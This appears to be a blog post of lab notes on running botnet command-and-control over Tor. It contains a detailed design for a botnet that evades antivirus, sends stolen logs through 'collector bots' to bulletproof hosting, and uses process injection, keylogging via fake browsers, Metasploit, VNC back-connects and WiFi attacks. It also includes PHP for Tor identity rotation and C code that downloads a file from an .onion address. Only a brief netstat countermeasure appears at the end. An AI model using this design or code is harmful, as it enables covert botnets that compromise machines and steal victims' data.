  • I’m a newbie coder and wrote this in C so it is very easy to do. I’m just in the process of porting the whole thing over to linux atm.
  • The most obvious way to do this would be to install Tor on compromised systems and have the bots set up to issue their commands through Tor.
  • Another way would be to just run the C&C server on Tor and have the bots use a tor to web proxy, either a public one or you could set up your own on compromised servers. The downside with this approach is that it would be a lot easier to block and shut down.
  • A third option is to run your own Tor network and have the clients with higher bandwidth and up-time act as relays. This would seem like the most difficult approach and would require you to run your own root server which would lessen the resilience of the botnet.
  • I prefer the idea of using the normal Tor network with bots acting as clients only. This option seems like it would be pretty easy to set up and would insulate you from a lot of the risks normally associated with running a botnet. I’m not sure if this would require much modification to the Tor code.
  • Assuming the network was only to comprise of Windows machines you could use the Tor Expert Package. If Tor could be installed from the command line and have it hide from the system as much as possible, such as not creating Start Menu entries and Desktop icons, then this could have some potential without really much work at all. Does anyone know if this is possible, can Tor be installed from the command line with flags that set the options that would need disabling and without popping up an install wizard? If this is possible then Tor wouldn’t even need modifying at all.
  • As far as I can see, assuming Tor is not compromised and you are careful about how you do it, this seems like the best way to run a resilient botnet. If the C&C server code is secure and you keep the attack surface to a minimum this sort of network would resist a lot of scrutiny before it could effectively be mitigated.

gAtOmAlO LaB nOtEs

Working on a similar project. Dark Umbrella fast flux/domain flux hybrid approach

(In development about 3-5 months left)

bot coded in assembly no dependencies

Each build has maximum of 10k bots to ovoid widespread av detection.

Basic bot uses socks5.

built in ssh client


Bot is built with 30k pre generated 256 bit AES keys.

1 256 bit AES key for logs

1 256 bit AES key ssh

1 256 bit AES key socks 5

hwid it selects a pre-generated key 256 bit AES key.

Bot writes encrypted data into common file using stenography

process injection

Download/Upload Socks5

Bot sends data to a collector bot via socks5 through ipv6 which makes NAT traversal a trivial matter.

Using ipv6 in ipv4 tunnel.

Collector bot assembly

tor and i2p Plug-ins C++

Assuming 10k bots

Bots will be assigned into small groups of 25. And are assigned 400 collectors bots which is evenly 200 tor and 200 i2p.

Collector packages the encrypted logs and imports them into a .zip or rar archive and uses sftp to upload through tor to a bullet proof server Note the Ukraine is best know

Russia is no good.

(Domain-flux .onion panel can be easily moved)

Using a Ubuntu Server on bullet proof server.

Using tor and Privoxy. Panel can be routed through multiple cracked computers using proxychains and ssh.

Server uses a simple .onion panel with php5 and apache2 and mysql.

You might ask what happens if bullet proof server is down. The collector bots can be loaded with 5 .onion panels. If panel fails for 24 hours its removed from all Collectors and bot will go to the next one and so forth.

A python Daemon runs and unzip the data and Imports it into a mysql database were it remains encrypted.

The bot master uses my Dark Umbrella.net panel to connect to the remote Bullet Proof server through a vpn and then through tor using ssh to run remote commands on server and

sftp to upload and download. Running tor through a log less vpn through with a trusted exit node on the tor network. .net panel connects to mysql database database is decrypted

on .NET panel (Note must real Bullet Proof hosting is not trust worthy this solves that issue) and imported into a local .mdb database. Then later the bot Master should encrypt

database folder on true crypt. Commands are sent to bots individually rather then corporately like most bot nets. This allows for greater anonymity It will be possible to send

commands corporately but strongly discouraged. Collector bots download and upload large files through i2p.

1.Connects remotely to rpc daemon through backconect and simplifying metasploit (Working)

2.Social network cracker. (in development)

3.Statics. (Working)

4.Anonymity status. (Working)

5.Decrypt-er. Decryption codes in highly obfuscated.net limiting each build to 10k bots. (Working)

6.Daemon status (Working)

7.logs (Working)

8.Metasploit connects via rpc. (working)

9. GPS tracked Assets by Google maps and using net-book with a high powered external usb wifi attenas.

Starts an automatic attack if wep if wpa2 grabes handshake. If open starts basic arp spoofing attack. Common browser exploits. (in development)

10.Teensy spread. (in development)

11.vnc back connect. (working)

12. Advanced Persistent threat. Fake Firefox, Fake Internet Explorer, Fake Chrome. Fake Windows Security Essentials. (in development allows for excellent custom Bot-master defined keyloging)

13. Dark search bot index file is downloaded allowing easy searching of hard drives. (Working)

14. voip logic bomb. bot computer is sent via a voip call file once played through voip the microphone hears mp3 file and the dormant payload is activated in bot that is the logic bomb. (in development)

bot Plug-ins developed later

Each Panel is hwid

1 unique build per Copy embedded into panel.


function tor_new_identity($tor_ip='', $control_port='9051', $auth_code=''){
$fp = fsockopen($tor_ip, $control_port, $errno, $errstr, 30);
if (!$fp) return false; //can't connect to the control port

fputs($fp, “AUTHENTICATE $auth_code\r\n”);
$response = fread($fp, 1024);
list($code, $text) = explode(‘ ‘, $response, 2);
if ($code != ‘250’) return false; //authentication failed

//send the request to for new identity
fputs($fp, “signal NEWNYM\r\n”);
$response = fread($fp, 1024);
list($code, $text) = explode(‘ ‘, $response, 2);
if ($code != ‘250’) return false; //signal failed

return true;

* Load the TOR’s “magic cookie” from a file and encode it in hexadecimal.
function tor_get_cookie($filename){
$cookie = file_get_contents($filename);
//convert the cookie to hexadecimal
$hex = ”;
for ($i=0;$i<strlen($cookie);$i++){
$h = dechex(ord($cookie[$i]));
$hex .= str_pad($h, 2, ‘0’, STR_PAD_LEFT);
return strtoupper($hex);


#include <stdio.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <curl/types.h>
#include <curl/easy.h>
#include <string>
#include <ctime>

size_t write_data(void *ptr, size_t size, size_t nmemb, FILE *stream) {
size_t written;
written = fwrite(ptr, size, nmemb, stream);
return written;

void startTor() {

int main(void) {

//    startTor();

CURL *curl;
FILE *fp;
CURLcode res;
char *url = “http://46lm7zhgildryehk.onion/files/msg.sig”;
char outfilename[FILENAME_MAX] = “C:\\msg.sig”;
curl = curl_easy_init();
if (curl) {
fp = fopen(outfilename,”wb”);
curl_easy_setopt(curl, CURLOPT_PROXY, “”);
curl_easy_setopt(curl, CURLOPT_URL, url);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_data);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, fp);
res = curl_easy_perform(curl);

return 0;


Now first gAtO will give you the counter-measures you see if they run Tor then a simple “netstat -ar |grep LISTEN” at any unix terminal will show you what is open and who and what is LISTENing on what ports:../

Now when I only only using Tor to browse: I run —>  :MacOS gatomalo$ netstat -av |grep LISTEN 

Tor Browser – tcp4       0      0  *.9030                 *.*                    LISTEN

after I run Tor manually to use system commands I can see my ticket out of the :MacOS gatomalo$ netstat -av |grep LISTEN

Tor tcp4       0      0  localhost.9050    *.*    LISTEN

Tor Bundle tcp4       0      0  *.9030                 *.*    LISTEN

So turn off 9050 port in your firewall.